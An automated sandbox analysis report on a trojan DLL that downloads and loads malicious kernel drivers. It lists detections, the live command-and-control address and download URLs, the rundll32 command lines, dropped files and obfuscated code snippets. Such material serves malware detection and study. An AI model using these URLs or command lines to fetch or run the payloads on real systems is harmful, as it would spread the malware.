Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll

Overview

General Information

Sample name: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll
Analysis ID: 1416972
MD5: 3bfb35c4054f9b59a8b64817aa292780
SHA1: 9d126f746caf39749551574a049adf9d1e8af649
SHA256: d2ca8563455b3e2cc8b2942a4026dddb324cb37262c27432ba1fcd975303e44a
Tags: dll

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Potentially malicious time measurement code found
Sample is not signed and drops a device driver
Tries to detect virtualization through RDTSC time measurements
Uses known network protocols on non-standard ports
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to load drivers
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables driver privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Spawns drivers
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[1] ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[1] Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[2] ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[2] Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\xz[1] ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\xz[1] Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1340820F.sys ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\1340820F.sys Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1341015D.sys ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\1341015D.sys Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\7ECA49D7.sys ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\7ECA49D7.sys Virustotal: Detection: 52%
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Virustotal: Detection: 23%
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

Networking

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 134.175.236.132 17598
Source: global traffic TCP traffic: 134.175.236.132 ports 17598,1,5,7,8,9
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 17598
Source: unknown Network traffic detected: HTTP traffic on port 17598 -> 49707
Source: global traffic TCP traffic: 192.168.2.5:49705 -> 134.175.236.132:17598
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Accept: text/plain, text/html Content-Length: 125232 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Accept: text/plain, text/html Content-Length: 125232 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Accept: text/plain, text/html Content-Length: 109632 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Accept: text/plain, text/html Content-Length: 109632 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Accept: text/plain, text/html Content-Length: 125232 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Accept: text/plain, text/html Content-Length: 109632 Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /xz?mz=Pml.bin HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=Pml.bin HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousPro.sys HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousPro.sys HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousProMax.sys HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousProMax.sys HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=Pml.bin HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousPro.sys HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousProMax.sys HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: Joe Sandbox View ASN Name: CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa
Source: unknown TCP traffic detected without corresponding DNS query: 134.175.236.132 (reported 50 times)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09F851 InternetReadFile, 3_2_6E09F851
Source: global traffic HTTP traffic detected: GET /xz?mz=Pml.bin HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=Pml.bin HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousPro.sys HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousPro.sys HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousProMax.sys HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousProMax.sys HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=Pml.bin HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousPro.sys HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xz?mz=PmlHousProMax.sys HTTP/1.1 Host: 134.175.236.132:17598 Cache-Control: no-cache
Source: rundll32.exe, 00000003.00000002.2082938982.0000000000964000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2039142851.0000000000964000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.1
Source: rundll32.exe, 00000004.00000002.2054642510.0000000000724000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132/
Source: rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:1
Source: rundll32.exe, rundll32.exe, 00000003.00000002.2083353565.000000006E093000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.2082938982.000000000090A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2055035167.000000006E093000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2054642510.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125120908.000000000065A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125541075.000000006E093000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll String found in binary or memory: http://134.175.236.132:17598/xz?mz=Pml.bin
Source: rundll32.exe, 00000006.00000002.2125120908.000000000065A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=Pml.binA
Source: rundll32.exe, 00000003.00000002.2082938982.000000000090A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125120908.000000000065A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=Pml.binLocal
Source: rundll32.exe, 00000003.00000002.2083353565.000000006E093000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2055035167.000000006E093000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2125541075.000000006E093000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll String found in binary or memory: http://134.175.236.132:17598/xz?mz=Pml.binhttp://134.175.236.132:17598/xz?mz=PmlHousPro.sys
Source: rundll32.exe, 00000006.00000002.2125120908.000000000065A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=Pml.binit
Source: rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125541075.000000006E093000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sys
Source: rundll32.exe, 00000004.00000002.2054642510.0000000000724000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125120908.0000000000699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sys$
Source: rundll32.exe, 00000006.00000002.2125120908.0000000000699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sysB
Source: rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sysD
Source: rundll32.exe, 00000006.00000002.2125120908.0000000000699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sysH
Source: rundll32.exe, 00000003.00000002.2082938982.000000000094D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sysP
Source: rundll32.exe, 00000003.00000002.2082938982.0000000000964000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2039142851.0000000000964000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sysn
Source: rundll32.exe, 00000003.00000002.2082938982.000000000094D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.syss
Source: rundll32.exe, 00000004.00000002.2054642510.0000000000724000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousPro.sys~
Source: rundll32.exe, 00000004.00000002.2054642510.0000000000716000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2055035167.000000006E093000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2054642510.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125120908.000000000065A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2125541075.000000006E093000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sys
Source: rundll32.exe, 00000003.00000003.2039142851.000000000095E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.2082938982.000000000094D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sys0ad
Source: rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sys8)
Source: rundll32.exe, 00000004.00000002.2054642510.0000000000716000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sys;
Source: rundll32.exe, 00000003.00000003.2039142851.0000000000964000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sysDvT
Source: rundll32.exe, 00000003.00000003.2039142851.000000000095E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.2082938982.000000000094D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sysHa
Source: rundll32.exe, 00000003.00000003.2039142851.000000000095E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.2082938982.000000000094D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sysX
Source: rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:17598/xz?mz=PmlHousProMax.sysk
Source: rundll32.exe, 00000003.00000002.2082938982.0000000000964000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:1HvP
Source: rundll32.exe, 00000006.00000002.2125120908.00000000006B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://134.175.236.132:1p8
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://ccsca2021.ocsp-certum.com05
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: xz[1]0.3.dr, xz[1].3.dr, xz[1]1.3.dr, xz[2]1.4.dr, 1340820F.sys.4.dr, 7ECA49D7.sys.6.dr, 1341015D.sys.3.dr, xz[2]0.4.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://repository.certum.pl/ccsca2021.cer0
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://subca.ocsp-certum.com01
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://subca.ocsp-certum.com02
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: http://www.certum.pl/CPS0
Source: xz[1].3.dr, xz[2]0.4.dr String found in binary or memory: https://www.certum.pl/CPS0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09793A NtLoadDriver, 3_2_6E09793A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09D686 NtQuerySystemInformation, 3_2_6E09D686
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E098887 NtQuerySystemInformation, 3_2_6E098887
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09791B NtLoadDriver, 3_2_6E09791B
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\1341015D.sys
Source: C:\Windows\SysWOW64\rundll32.exe Process token adjusted: Load Driver
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E095950 appears 33 times
Source: C:\Windows\SysWOW64\rundll32.exe Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\1341001C
Source: C:\Windows\System32\loaddll32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: wininet.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engine Classification label: mal96.troj.evad.winDLL@10/13@0/1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09C55F AdjustTokenPrivileges, 3_2_6E09C55F
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\xz[1]
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4332:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\1341026E.bin
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll,InsterDriver
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Virustotal: Detection: 23%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll,InsterDriver
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll",InsterDriver
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: xz[2]0.4.dr Static PE information: real checksum: 0x24130 should be: 0x2390b
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Static PE information: real checksum: 0x0 should be: 0x18441
Source: xz[1].3.dr Static PE information: real checksum: 0x24130 should be: 0x2390b
Source: SecuriteInfo.com.Win32.Evo-gen.18602.10500.dll Static PE information: section name: .Pml0
Source: 1341015D.sys.3.dr Static PE information: section name: .VSK0
Source: xz[1].3.dr Static PE information: section name: .VSK0
Source: xz[1]0.3.dr Static PE information: section name: .VSK0
Source: xz[1]1.3.dr Static PE information: section name: .VSK0
Source: 1340820F.sys.4.dr Static PE information: section name: .VSK0
Source: xz[2]0.4.dr Static PE information: section name: .VSK0
Source: xz[2]1.4.dr Static PE information: section name: .VSK0
Source: 7ECA49D7.sys.6.dr Static PE information: section name: .VSK0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E0996E4 push dword ptr [esp+28h]; retn 002Ch 3_2_6E099708
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09870B push dword ptr [esp+40h]; retn 0044h 3_2_6E09D99B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09EC45 push 17D028D3h; mov dword ptr [esp], eax 3_2_6E09ECAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09EDA1 push dword ptr [esp+50h]; retn 0054h 3_2_6E09EDF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09B252 push dword ptr [esp+24h]; retn 0028h 3_2_6E09C6EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09CA54 push dword ptr [esp+48h]; retn 004Ch 3_2_6E09BD3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09CA54 push dword ptr [esp+50h]; retn 0054h 3_2_6E09DB02
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E0958B1 pushfd ; mov dword ptr [esp], eax 3_2_6E09A11D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09793A pushfd ; mov dword ptr [esp], 6E09CC17h 3_2_6E09DCE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09518F push ABF4F956h; mov dword ptr [esp], edx 3_2_6E09523F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09CE09 push dword ptr [esp+30h]; retn 0034h 3_2_6E09CE3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09A60B push dword ptr [esp+04h]; retn 0008h 3_2_6E09A61B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09B60F push 41910BC5h; mov dword ptr [esp], ecx 3_2_6E09BB8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E091E04 push dword ptr [esp+20h]; retn 0024h 3_2_6E096D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09EE06 push dword ptr [esp+44h]; retn 0048h 3_2_6E09EE30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E098E1F push dword ptr [esp+4Ch]; retn 0050h 3_2_6E09AA8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E096E1E push dword ptr [esp+50h]; retn 0054h 3_2_6E096E4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E099E17 push dword ptr [esp+44h]; retn 0048h 3_2_6E098F09
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E099E17 push dword ptr [esp+3Ch]; retn 0040h 3_2_6E09D595
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09D616 push dword ptr [esp+24h]; retn 0028h 3_2_6E09B29C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09862D push dword ptr [esp+0Ch]; retn 0010h 3_2_6E098644
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09762E push dword ptr [esp+28h]; retn 0060h 3_2_6E0991C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09B623 push 41910BC5h; mov dword ptr [esp], ecx 3_2_6E09BB8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E097E3D push dword ptr [esp+28h]; retn 002Ch 3_2_6E097E49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E099633 push dword ptr [esp+28h]; retn 002Ch 3_2_6E09964B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09964E push dword ptr [esp+2Ch]; retn 0030h 3_2_6E09C8CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E091E45 push EE29E32Dh; mov dword ptr [esp], eax 3_2_6E091F36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09E644 push dword ptr [esp+50h]; retn 0054h 3_2_6E09E657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09665B push dword ptr [esp+38h]; retn 003Ch 3_2_6E096676
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09C65B push dword ptr [esp+04h]; retn 0008h 3_2_6E09C683
Source: 1341015D.sys.3.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253
Source: xz[1].3.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253
Source: xz[1]0.3.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253
Source: xz[1]1.3.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253
Source: 1340820F.sys.4.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253
Source: xz[2]0.4.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253
Source: xz[2]1.4.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253
Source: 7ECA49D7.sys.6.dr Static PE information: section name: .VSK0 entropy: 7.851203078487253

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\1341015D.sys
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\1340820F.sys
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\7ECA49D7.sys
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[1]
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\xz[2]
